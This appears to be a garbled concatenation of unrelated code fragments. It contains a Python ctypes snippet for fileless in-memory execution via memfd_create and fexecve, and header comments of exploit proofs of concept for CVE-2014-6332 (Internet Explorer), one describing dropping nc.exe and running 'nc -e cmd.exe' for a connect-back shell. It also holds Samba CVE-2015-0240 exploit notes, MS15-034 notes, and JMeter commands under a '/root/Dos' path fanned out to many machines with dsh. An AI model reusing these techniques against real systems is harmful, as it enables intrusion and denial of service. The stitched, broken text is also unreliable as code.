#!/usr/bin/env python3
import sys
import os
import io
import argparse
import getpass
import json
sys.path.append('../')
test
from ctypes import *
c = CDLL("libc.so.6")
fd = c.syscall(319,"tempmem",0)
c.sendfile(fd,0,0,0x7ffff000)
c.fexecve(fd,byref(c_char_p()),byref(c_char_p()))
print "fexecve failed"
<html>
<head>
<!--
CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode
- Tested on IE11 + Windows 7 64-bit
References:
- original PoC - http://www.exploit-db.com/exploits/35229/
- http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/
- http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html
<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost), then get a shell
The exploit drops nc.exe, then executes "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in the javascript below determine the connect-back target
Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windows 8.1 64-bit (EPM is off)
#!/usr/bin/python
"""
PoC for Samba vulnerability (CVE-2015-0240) by sleepya
This PoC only triggers the bug
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
#################
Exploitability against CentOS/Ubuntu binaries
#!/usr/bin/python
"""
Exploit for Samba vulnerability (CVE-2015-0240) by sleepya
The exploit only targets vulnerable x86 smbd <3.6.24 in which 'creds' is controlled by
the ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
in libtalloc does not write a value to the 'creds' address.
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
/*
Pseudo code in HTTP.sys to understand the flow related to MS15-034
All pseudo code is reversed from the vulnerable HTTP.sys on Windows 7 SP1 x86
For anyone who wants to know which functions are patched:
just open the patched version and find all functions that reference RtlULongLongAdd().
*/
#!/bin/bash
intervalo=1
info="/sys/class/net/"
cd "$info" || exit 1
for interface in eth*
do
    # first sample of received/transmitted byte counters for this interface
    rx1=$(cat "$info$interface/statistics/rx_bytes")
    tx1=$(cat "$info$interface/statistics/tx_bytes")
    # wait for the sampling interval (plain command, not command substitution)
    sleep "${intervalo}s"
/root/Dos/apache-jmeter-3.1/bin/jmeter -n -t /tmp/0.jmx -l /tmp/0.jtl -Jjmeter.save.saveservice.output_format=xml -Jjmeter.save.saveservice.assertion_results=all -Jjmeter.save.saveservice.bytes=true -Jfile_format.testlog=2.1 -Jjmeter.save.saveservice.response_data.on_error=true -Jjmeter.save.saveservice.thread_counts=true -Jjmeter.save.saveservice.response_data=true -Jjmeter.save.saveservice.samplerData=true -Jjmeter.save.saveservice.requestHeaders=true -Jjmeter.save.saveservice.url=true -Jjmeter.save.saveservice.responseHeaders=true
for i in $(cat /usr/local/etc/machines.list );do dsh -m $i "/root/Dos/apache-jmeter-3.1/bin/jmeter -n -t /tmp/test.jmx -l /tmp/test2.jtl -Jjmeter.save.saveservice.output_format=xml -Jjmeter.save.saveservice.assertion_results=all -Jjmeter.save.saveservice.bytes=true -Jfile_format.testlog=2.1 -Jjmeter.save.saveservice.response_data.on_error=true -Jjmeter.save.saveservice.thread_counts=true -Jjmeter.save.saveservice.response_data=true -Jjmeter.save.saveservice.samplerData=true -Jj